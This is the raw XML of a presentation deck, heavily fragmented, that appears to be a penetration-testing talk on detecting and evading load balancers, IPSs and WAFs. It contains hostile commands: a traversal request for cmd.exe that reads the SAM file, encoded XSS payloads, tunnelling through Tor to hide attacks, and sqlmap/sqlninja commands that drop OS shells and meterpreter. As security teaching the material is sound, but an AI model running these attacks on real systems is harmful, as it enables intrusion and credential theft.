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5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0" y="0"/>
            <a:ext cx="2921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3886200" y="0"/>
            <a:ext cx="2921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2640" y="379080"/>
            <a:ext cx="451332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49705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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8651880"/>
            <a:ext cx="2921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9E073-FCD4-414E-BF68-38EDE45820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5C165-ADE5-4062-B382-6207487AB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A653E-2988-4847-9F90-AB1B6B893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B0462-F372-444F-A8BB-F96B703EA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BC4D6-2127-4FC5-BE61-877370E1F5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4971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4ABE6-CCA1-470B-A2D1-12885DB1DA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2A388-0100-4C73-ADC8-B55085DF9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C298E-900A-4BE4-85B7-FBCFC33D8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231DD-CD2A-49EA-B793-621D021D5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B55AB-F6B8-4E60-8F2B-86B8FB071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8C05B-6E1C-49D6-A002-819303980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0EFB9-CCF5-4906-AE3B-9799C8436B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C01BB-06B8-4534-9158-B29F60A9FC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DABD3-6A7F-455A-8CBB-ADAB71214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F7E6F-63D0-49F2-9A73-86DF8510D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A3258-25A8-4057-8026-D27097B3FD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282CF-775A-489F-92E6-5742297F6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E25EB-6A0E-451D-BEB5-D9C983D8C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3F032-6D7D-4A3B-BB59-30247AA6D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33E8B-23D3-4DA8-92AE-B800E24DD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F2324-CB92-4F92-821D-DFE12F713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A8D9D-49AD-44F5-AA55-8063E04F4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1A35B-3F96-4015-9A8C-318C386E2F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998D7-2C11-47C2-A500-7AFB0097E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DD754-9264-45E5-B91F-802A257CB4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13C46-CA9E-4087-854B-5889F3682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8A660-0B68-4711-B71F-1219D1B528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4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AFDE3-8D06-4108-B8EE-DC5A30914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86360" cy="410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E4471-FE04-4D51-BB15-64D3750130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C4F0E-8DA5-4D36-A051-629A90E8DB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CAEDC-5775-4F31-A332-483DBC236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7729-A99B-4991-B210-C80C6ED48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7C488-3E37-441C-8C9B-D424EFC04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48B30-5E23-440D-8815-7808D69D9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FE48B-D192-4E1D-AC5D-1FFE02B0E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0B5EC-078E-433A-A787-8EEEF2F34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29583-6291-4F62-AF43-1A00D0342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37EA6-88E0-4C89-AD44-B358E46D6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B3EDC-A2A9-478F-9933-309312998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1A5C5-AC15-4350-9DF9-6AFDACB9C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2CEA6-F3C9-4FDF-AF3B-B7E84E1A6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F035B-FF14-433E-8502-43E01BA835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5EE80-8C26-4BFB-827A-771D4BC53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1D871-8BAD-42DE-8A29-4CE1EF3A99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440FA-CEE7-40AF-975F-97931404F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C40BC-0C37-4511-B134-E1450356A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8D67E-F8B0-47E4-A644-642B8E550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59BAD-00D0-4D8B-8363-ECD73EB60F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BB407-5478-4006-8E80-7FEB71D92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6D3DD-E32D-4A34-BDC6-BAA3C91392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7B609-AB80-4C79-9A59-1FB78BDB3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CFB09-CE94-4F53-BC97-898A0D47D0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7B70D-1801-40BD-9C64-60C443A8A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5A7D0-B4F0-41D6-865E-7C3809D921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446E6-489F-4FB5-BD38-5953272AD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C9307-05B5-4585-9489-902DCC5B1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5DF6E-09E4-4346-91D2-3E1DC2B3C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27226-6F84-44AF-BB0B-F6C8D442B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71FCE-DF37-4D54-B228-9DF7679A79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B2F68-157C-4DFD-805A-1AF7E5CE7C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8F745-5D12-489A-B8C2-29A7B58FBC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2753A-EF18-4207-A2A1-33BA00982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C5343-3DFD-415A-852F-A9C020E11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35308-4A3D-411F-A194-7C17823AF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572AB-5972-4929-97CB-F61010B75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3C737-E1F8-4AEC-ACC3-854CBE42E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09413-631F-4403-A7F3-7CCC5F320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A252F-FC2B-431D-9564-6B499693C4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16F2B-360C-4E37-84A7-F79E1DA14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8222F-471F-4557-904E-B4932DC79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51063-8024-4C64-B462-840EEBA25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11178-5E98-4ED9-BD90-1944BFA4BB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4CA63-77FF-4838-97A3-8EA34821D9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6AA80-4195-44F4-A88D-863EDB743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4585E-D0EC-4B1A-B2A9-258B55B1D3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F1398-17BE-43E8-9058-2FA2F61D3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7356C-6645-483D-8263-66119F037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202E4-BA81-4AE6-B293-198F4CC86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5A6D0-2D79-42A6-8D93-49C753A3DB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A39AD-A46D-46B9-948F-A3F7F95CE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C1B36-73E1-4AE8-B7A9-7E489A432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8B0CE-EB52-4FC2-8168-C3B495C0A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3B52B-666A-4033-862A-6073A5BC8B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763EF-1281-4BD4-AD29-2F93B4846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9D900-BBA8-4912-8AB1-B99CF5146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975C8-F507-468D-9E6C-AC26E697CF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C2BA1-0B97-4AD0-83C6-D66E193B0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456F7-FDC2-465E-88BB-DB584C71CF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9A400-CCA7-4BB4-8F14-29E94C40EF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9311F-4E8C-4382-9533-59FBE68FA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1B1DB-797D-470D-9E66-6DC20D608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C3F36-E822-4637-AC23-80947F9C9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E6E4B-4129-4C75-832F-4FA45FF3B5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5B44B-8753-46CD-8B1D-0F35982D3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505C6-190E-40D3-8F15-DDD898639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57F1C-1D89-49D3-8E83-AE6054270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4D293-8C25-49BD-A9C6-2703C1D6E5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9C077-8269-4419-9877-B017AB83F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876AC-E976-46DF-AF57-FF2F3825B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79A55-CAD9-4D12-B0E5-0F8504F8C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99B8D-41C6-48A0-B25B-1565AB365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72CE5-B0C3-46C1-97A0-94D15C3C0B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A1CE1-C48A-48EC-BA25-226A0FC5B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F986A-EE5D-4FEC-86E7-A76375FC5D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77E17-47FF-49F3-B860-1FC52C95B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F8AF5-256B-49BA-8CEE-3B1CD123EE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31F37-C952-4BC8-A37C-EFE369BB8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4152B-14C3-48D0-8B77-3808CD6F2B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25840-9C84-4F38-8601-BD5EBA5409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5EFFF-75E4-4287-9415-19896529C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30788-8305-4419-872C-AB8A6706E7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67EC3-227A-4CFD-9BBD-BC66F1E821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50703-9AB0-4E40-A119-E7AEB3FA3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C9646-B87B-4AA9-BE81-CB15C7787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A9FB3-843B-4325-90F9-896DA2063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C6444-E6F3-41E8-B436-7BE7A7172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BE41C-79DB-467E-B3AE-9DC0B2C016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30225-1D5C-4867-B54C-E1F1F07CF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D0FBC-3A08-4488-8620-B3ECDA7EB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BB911-7CD4-42A9-BB53-B936BE8782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22E48-B028-4C27-9B88-83DF7F2250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ED57A-57A8-4901-9269-B32C29C9A3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1E74F-B797-47F5-B9A9-0BD1B0FA3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49563-2485-4C16-9277-AAAE1090B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45BE8-4A44-4D69-B9AB-E94E63697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7092F-6E6E-48DA-BC0E-A352A6413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0DF55-C0B0-41B0-AC12-A8C49AFAA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DC34F-14F7-43B7-8C2E-55FBBB0BA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28FA3-6B41-4C0E-BE28-88AB3B45F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67173-9DD6-4BF0-A6E1-A7E1AE157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607A7-F6E0-49A6-85D1-139C2434B5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B2A2B-29CF-4343-8974-1863C9435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FABDC-2B01-4E54-A3B4-FFF78F3406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06415-6DD5-4DFC-BB95-E08FB4D1D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E43D0-9480-4588-83CB-36A6EDCC6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22ACE-4730-4018-99D5-4D9487959B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9A0B1-38F5-4BD7-BC5D-3A835862B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AF536-4C19-45B5-B539-054AE60720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2BECA-5CDD-4648-9C37-116C78C7A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005E0-EB6A-4080-A02D-EBE700AF3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5CC59-36A2-4A18-B289-07827D825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00851-1AEC-4FF3-B7A7-0CB0E23AE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AF97B-67AB-468A-AC70-F70D772A5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7CAC3-354B-4F82-A016-070C3A24EB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2811B-C491-4AFD-A421-15A0D4AF3D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D35DC-1851-4B15-9D92-F0B8C6DA6B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1690D-5C06-4541-A459-5847A619D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15751-4198-4782-9977-64B2DD9B2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AFCFF-A18C-4D5C-93DB-85D046C58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6D3B4-B08B-430C-9839-6852F3AE2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FC024-E89B-477D-B604-E2E001EAF9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AD2FD-C905-457B-B207-B128540D7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036FF-3A01-43DD-8E43-6BA6F3F5E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41684-E176-473D-8C9C-DDFDECEC6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C4108-46D0-4BCF-9B67-D9356822F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62B11-B676-4646-98DE-0EF8BD68D5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8F5F9-9B04-488B-983F-7B7D6F203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A14D5-0A63-4D97-BA03-C1BCF28C9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B875-0164-4062-9BC4-1BC8EBE2E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E15F6-FD66-4AB6-A4F4-6FA673034F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AC378-7142-4005-8B3E-E97D6D4F7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A4A74-0CD3-4732-A086-8576A3831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F1B23-CE31-4019-9BC2-99C133A3F1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59CA4-DCE8-4A17-B8FD-1CCFC04F6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9DF19-413A-4F2F-863C-7C54CFE81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75DB9-88B2-4C21-8CC6-925B0FD93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92573-F91E-4018-BAB4-15AB5211C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77AEF-17D5-471F-8020-BEA7E657C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64336-8647-49E8-8A26-4CE882B48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B8508-00D5-4A25-8E26-D42124DF67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37C18-0DBD-4C2F-8F67-B3ED615FC1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F895C-96E0-43DE-9648-59F9A1AED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C3DC5-4784-4223-8CFA-D33EE549C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52F31-C252-4A8E-8019-5353AA8CE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29434-3133-42FF-BFD1-F118F2A95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72BF8-DBF3-4598-B4E3-D8B20795F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445C1-B8B6-4BA2-AC0A-7623C36212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E8AB4-8566-44F9-BF3D-D3CE9E6F4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8E895-3871-4275-868B-B0CCD6F6A3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4047C-8C42-45A0-AC1B-BECAC9A17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D36B7-52FF-4DE1-AD1D-1CC55DF84E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D6F11-4EC9-456E-98B4-F581D4B653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15996-0CA1-4376-8E55-A8D7C069B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C46BC-2CE5-4D60-97E9-DC67D1F59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7A8F6-2583-4978-8127-B928048A2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3ECED-EDB7-4334-A988-0B21ECEA82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274BB-97BF-47D5-93F1-6A1B3C39E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0C891-EC49-46B4-B6B6-9B563C338B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E516B-B9ED-4537-A187-4310E981D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FBF47-19E9-41C6-A41D-C5305BF19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85E97-2F3A-4278-B56A-05A5629EA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16592-1808-4DAB-8222-A3EEDA261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DC16A-A69B-4165-8ADB-61A24AC55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86C4A-2472-4E3C-ACD9-118AB9961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E1032-C1F6-423A-8CA8-03785812A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F15BD-7970-48DF-9E7B-2C7144778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6D3B7-1CBF-4B71-A9E0-E8C4642064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78C5E-12C8-4CC3-84DF-C8CB61951E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D6983-6B2C-465A-8D3C-A7F463C7F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CE5D2-3EC2-4921-9413-D9CDA2BEC7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70978-E87D-4F43-AC1E-AD1D8CD214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F3A87-6854-4AD9-9BA2-D17F1068C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78506-E11C-49F9-A1AF-CBB3C1420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109F9-4D1E-490E-A429-5B9CE7B6E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7E11-0502-4095-BEAD-199579B59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488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1745-DB2A-4204-9311-2BAA8F441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16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D642-4E4B-4C37-AC9D-4968B1CF2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704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60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704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60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4EF0-B17C-429A-B72F-08A535794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07291-37D1-4F32-81D1-6BE6CA18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64F5D-0EB5-4833-B678-AF8E9323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A4999-CD81-4786-9CA3-9F122FC5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75C1D-E7C8-4634-B12A-BEC7423E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A6A0F-C446-4714-8557-5DB3F7C8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1932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279C0-BF3E-4B9C-BED6-F44EFDFD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1515B-CA39-4CF5-836E-1E66437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1161-1337-40D1-BEED-EB0DB8EA6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516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1E252-E3A6-455C-9266-5E23D6CE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6419F-A473-4784-BB7F-C221717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4488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6890C-AE28-4AED-AB2F-DA56040F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516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34435-6621-4E01-9133-133FF64C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704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760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704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760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492DA-7B67-4C54-B5F7-1171A6AC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C565-0BD8-49EE-9814-FF86AB845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92ED-4EB0-4FA1-B27E-90BD043FD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A7C1-939E-432E-B5E8-317DC4697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1932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0458-0A67-48DB-8C7D-22F3A7AC9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2081-9B5B-4C9D-B573-070AC70FB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16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1B55-FFDE-4D3F-92AB-E51D37980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21BD-D04E-451A-A9E7-42A49743F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6360" indent="-30636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4912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67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4920"/>
            <a:ext cx="20973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A9395-1955-45DE-A570-4D5F7C6003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57200" y="6245280"/>
            <a:ext cx="21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4080" y="6245280"/>
            <a:ext cx="2867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6360" indent="-30636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4912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00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8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3720" y="6245280"/>
            <a:ext cx="2862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8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00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C2F1B-EA87-4208-BF20-6A1F506146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871560" y="851040"/>
            <a:ext cx="7196040" cy="5087880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f2f2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769080" cy="3773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685800" y="19051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You Spent All That Mone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...And You Still Got Ow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057400" y="3581280"/>
            <a:ext cx="5334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esented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Joe McC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joe@learnsecurityonlin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http://www.linkedin.com/in/joemcc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http://twitter.com/j0emcc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3429000" y="582480"/>
            <a:ext cx="1944720" cy="11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457200" y="274320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97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Own the boxes and take screen-shots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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2066760"/>
            <a:ext cx="4114800" cy="341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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875120" y="2286000"/>
            <a:ext cx="3811680" cy="4019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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="541440" y="3200400"/>
            <a:ext cx="3801960" cy="3295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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206880" y="3886200"/>
            <a:ext cx="547992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457200" y="274320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0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Write The Report...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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="2039760"/>
            <a:ext cx="662940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457200" y="274320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1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Get Paid....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6629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228600" y="228600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More Security Measures are being implemented on company network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Firewalls are common place (perimeter and host-bas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Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer overflo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Intrusion Detection/Prevention Systems are hard to detect let alone byp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NAC Solutions are making their way into net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Network/System Administrators are much more security consci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IT Hardware/Software vendors are integrating security into their SD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2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8458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Geez...That's A Lot To By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228600" y="19051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Google loves SQL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Microsoft OLE DB Provider for SQL Server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Microsoft JET Database Engin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Type mismatch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You have an error in your SQL syntax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Invalid SQL statement or JDBC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DorisDuke error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OleDbException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JasperException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Fatal Error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supplied argument is not a valid MySQ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mysql_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ODB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JDB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ORA-009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ADO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3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8458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Ask Google To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228600" y="19051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Google loves RF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file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folder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path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style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template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PHP_PATH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doc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document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document_root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pg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pdf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3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8458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Ask Google To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152280" y="205740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ct like a woman trying to catch her man cheating – look through EVEYTHING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Firefox Passive Rec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s://addons.mozilla.org/en-US/firefox/addon/61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1. DNS – AS – Server Version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2. Email addr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3. Files (Doc,PDF, e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altego (Data Relationship Identific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www.paterva.com/web5/client/overview.p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1. DNS – AS – Server Version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2. Email addr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3. Files (Doc,PDF, e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4.  Social Me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5. Too much to list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4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Do Passive Recon/OS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152280" y="2286000"/>
            <a:ext cx="8839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Most load-balancers are deployed for redundancy and performance improv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s an attacker – load balancers are a headach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You have no idea where you packets are going.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There is absolutely no point in running tools against a host without knowing if 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load balancer has been deploy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o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Determine if the host is load balanced.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ep 2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Determine what type of load balancing is in place (HTTP or DNS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5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Identifying Load Balanc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152280" y="2286000"/>
            <a:ext cx="8839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tell if the target host is behind a load balanc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Firefox LiveHTTP Hea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s://addons.mozilla.org/en-US/firefox/addon/38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Look in HTTP header for modifications such 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1. BIGipServerOS in cook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2. nnCoection: cl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3. Cneonction: cl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Look for multiple addresses resolving to one domain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dig google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5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Identifying Load Balanc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152280" y="2286000"/>
            <a:ext cx="88394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tell if the target host is behind a load balanc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Netcraf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Look for things like "F5 BigIP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lbd.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ge.mine.nu/lbd.html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sh lbd-0.1.sh targetcompany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albe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halberd.superadditive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halberd -v targetcompany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6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Identifying Load Balanc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8" descr=":::Picture 2.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3276720"/>
            <a:ext cx="7620120" cy="1269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Y:\Desktop\Screenshot.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181480" y="4952880"/>
            <a:ext cx="342900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228600" y="251460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5200" indent="-565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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>A Network/Web Application Penetration Tester &amp; Tr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.K.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The black guy at security con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37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46200"/>
            <a:ext cx="88394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Joe McCray.... Who the heck are you?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152280" y="228600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Ok – so now you've figured out if you are up against a load balanc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You've figured out if it's HTTP or DNS based load balancing and what the real IP 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Just like there's no point in running tools against a load balanced host there is no poi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in running tools against a host that is protected by an I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ooooo...how can you tell if the target host protected an Intrusion Prevention System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7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152280" y="228600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tell if the target host protected an Intrusion Prevention System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url: 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The netcat of the web app wor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2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://curl.haxx.se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url -i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http://www.targetcompany.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>../../WINNT/system32/cmd.exe?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url -i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http://www.targetcompany.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>type+c:\winnt\repair\sam.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Look for RSTs and no response....tcpdump/wireshark is your friend ;-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ctive Filter Det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www.purehacking.com/afd/downloads.p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osstmm-afd -P HTTP -t targetcompany.com -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8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152280" y="228600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Ok, so you're up against an IPS – relax...there are a few other things to consi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IN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Most IDS/IPS solutions don't monitor SSL encrypted (actually any encrypted) traff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SL Accelerators are expensive so not everyone has o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8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228600" y="22860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Most of the time you can get around an IPS by just using encry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The other thing to consider is whether the IPS is in-line or out of ban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9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152280" y="2057400"/>
            <a:ext cx="8839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Does the IPS monitor SSL encrypted traffic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 /etc/xinetd.d/sslt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#default: o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#description: OpenSSL s_client proxy (just change the target url)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c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ice kerbe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disable = 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ocket_type = stre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port =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888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wait = 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protocol = tc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user = ro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er =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/home/j0e/security/toolz/ssl_proxy.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only_from =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127.0.0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bind =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127.0.0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03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152280" y="205740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Does the IPS monitor SSL encrypted traffic? (Cont.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 /home/j0e/security/toolz/ssl_proxy.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#!/bin/ba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openssl s_client -quiet -connect www.targetcompany.com:443 2&gt;/dev/null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tart the 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/usr/sbin/xinetd -d -f /etc/xinetd.d/ssltest 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Run AFD against localho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osstmm-afd -v -P HTTP -t localhost -p 8888 -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10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228600" y="2057400"/>
            <a:ext cx="883908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To run scanning tools through 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ias hide='su -c "/home/j0e/dumbscripts/hide.sh"'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$ cat /home/j0e/dumbscripts/hide.s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!/bin/ba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 Startup privo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/usr/sbin/privoxy /etc/privoxy/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 Start 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/usr/bin/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$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hide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 socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:targetcompany.com80,socksport=9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Now all attacks can be launched against 127.0.0.1:8080 with Nessus or similar to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17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Attacking Through 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2286000"/>
            <a:ext cx="906768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What if you don't detect any active filtering solution in plac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an you still be missing something that messing with your traffic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What about a WAF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Most hosts running a WAF will show as not have an Active Filtering Solution in place by tools like AF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2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Are We Forgetting Something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*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https://addons.mozilla.org/en-US/firefox/addon/382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* Look in HTTP header for modifications such a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1. Cookie Value has WAF info in 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- BIGipServerwww.google.com_pool_htt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- barra_counter_s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- WODS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2. Different server response code for hostile requ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- 501 Method Not Implemen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3. Different "Server" response when hostile packet is s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3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152280" y="2286000"/>
            <a:ext cx="8839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WAFs are surprisingly easy to detect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Generally you just have to send 1 valid request, and one malicious request and diff the respons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Malicious tends to be any HTTP request that has a payload that contains things lik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'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&lt;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#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|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3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228600" y="2209680"/>
            <a:ext cx="8686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Arial"/>
              </a:rPr>
              <a:t>I H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Arial"/>
              </a:rPr>
              <a:t>I C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Arial"/>
              </a:rPr>
              <a:t>I DRINK (Rum &amp; Cok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4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How I Throw Down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>
            <a:off x="0" y="1407960"/>
            <a:ext cx="9144000" cy="511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152280" y="2057400"/>
            <a:ext cx="8839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u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url -i http://targetcompany.com/cmd.exe | grep "501 Method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Netc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4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$ (echo "GET /cmd.exe HTTP/1.1"; echo "Host: targetcompany.com"; echo) | nc targetcompany.com  | grep "501 Method Not Implemented"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100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>If the server responds with error code “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>501 Method Not Implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>” then it is running mod_security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u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url -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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%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HTTP/1.1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999 No Hack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er: WWW Server/1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4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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="43434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407960"/>
            <a:ext cx="9144000" cy="511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228600" y="22860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u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url -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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%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er: Ap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Location: http://www.targetcompany.com/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53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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3978360"/>
            <a:ext cx="4114800" cy="15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0" y="1407960"/>
            <a:ext cx="9144000" cy="511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228600" y="223992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u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url -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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3c%73%63%72%69%70%74%3e%61%6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%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3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3333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 Condition Intercep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Date: Sun, 15 Mar 2009 01:42:01 GM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er: Ap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6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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1407960"/>
            <a:ext cx="9144000" cy="511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228600" y="22860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affit (WAFWOO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6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9" descr=":::Picture 1.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="3124080"/>
            <a:ext cx="86104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1407960"/>
            <a:ext cx="9144000" cy="511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228600" y="22860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Gary O'Leary-Stee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2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.org/web/unicode-fun.t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[j0e@LinuxLaptop toolz]$ ruby unicode-fun.r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Enter string to URL Unicode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:&lt;script&gt;alert('XSS')&lt;/scrip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%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%u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54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff5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%uff49%uff50%uff54%u003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u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url -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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3c%73%63%72%69%70%74%3e%61%6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%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3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HTTP/1.1 404 Not Fou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Date: Sat, 14 Mar 2009 19:13:10 GM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er: Ap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7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ypass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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2286000"/>
            <a:ext cx="88390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ias hide='su -c "/home/j0e/dumbscripts/hide.sh"'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$ cat /home/j0e/dumbscripts/hide.s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!/bin/ba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 Startup privo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/usr/sbin/privoxy /etc/privoxy/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 Start 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/usr/bin/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$ hide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Firefox Tor But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* </a:t>
            </a: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https://addons.mozilla.org/en-US/firefox/addon/227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lick on Firefox TOR button and have fun hac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83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Attacking Websites Through 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89" name="Line 4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7" descr="dotNetDefenderBlock.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2133720"/>
            <a:ext cx="7696080" cy="4572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DotNet Defender W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96" name="Line 4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8" descr="dotNetDefenderBypass.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2362320"/>
            <a:ext cx="6629400" cy="426708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ypassing DotNet Def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03" name="Line 4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DotNet Def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11" descr="lol_highmark3.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2209680"/>
            <a:ext cx="8153280" cy="45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10" name="Line 4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Dumping Admin PW – sorry DotNet Def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7" descr="lol_highmark5.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2209680"/>
            <a:ext cx="84582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57200" y="1981080"/>
            <a:ext cx="82296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Remembering the good old days.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Identifying Hacker Headach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Load Balanc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Intrusion Prevention Systems (IPSs)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="14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Web Application Firewalls (WAFs)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="14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Network Access Control (NA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Dealing with the Roadbl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Intrusion Prevention Systems (IPSs)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="14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Web Application Firewalls (WAFs)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="14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Network Access Control (NA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Playing with Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="14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Piv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5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228600" y="2286000"/>
            <a:ext cx="8915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1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Getting Into The LAN from the web....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228600" y="20574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d /home/beatdown/toolz/sqlninja-0.2.3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vi sqlninja.beatdown.con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host = [target ip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page = /vuln/vulnpage.as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tringstart = VulnID=1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lhost = [your ip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device = eth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msfpath = /home/beatdown/toolz/metasplo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resolvedip = [your ip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/sqlninja -m t -f sqlninja.beatdown.conf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(test for injecti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/sqlninja -m f -f sqlninja.beatdown.conf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(fingerprint the backend d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/sqlninja -m u -f sqlninja.beatdown.conf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(upload dnstun, netcat, or meterpre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/sqlninja -m s -f sqlninja.beatdown.conf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(drop a shel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2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SQL Injection to Metasploit (SQLNinj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228600" y="20574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d /home/beatdown/toolz/sqlmap-de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python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-shell -v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os-shell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python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-pwn --msf-path /home/beatdown/toolz/metasploit --priv-esc -v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meterpre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SQL Injection to Metasploit (SQLM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3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Not Getting Ca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8" descr="Tiger-Woods-Mistresses-298x300.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="236232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I know that people often think this stuff is very black and white, cut and dry - but th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simple truth with sql injection is sometimes you just have a gut feeling that you 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looking at a vulnerable pag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You've tried a bunch of things but for some reason nothing seems to be working. Yo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may be facing some sort of filtering. Maybe the developer has attempted to stop sq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injection by only allowing alphanumeric characters as inpu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47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Filter Eva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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="25146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The first thing that we want to do is determine if the filtering is client-side (ex: be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done with javascrip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View source code and look for any parameters being passed to the website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may be filtered with javascript/vbscript and remove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- Save the page locally and remove offending javascript/vbscrip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- Use a local proxy (ex: Paros, Webscarab, Burp Suite)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ar-SA" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
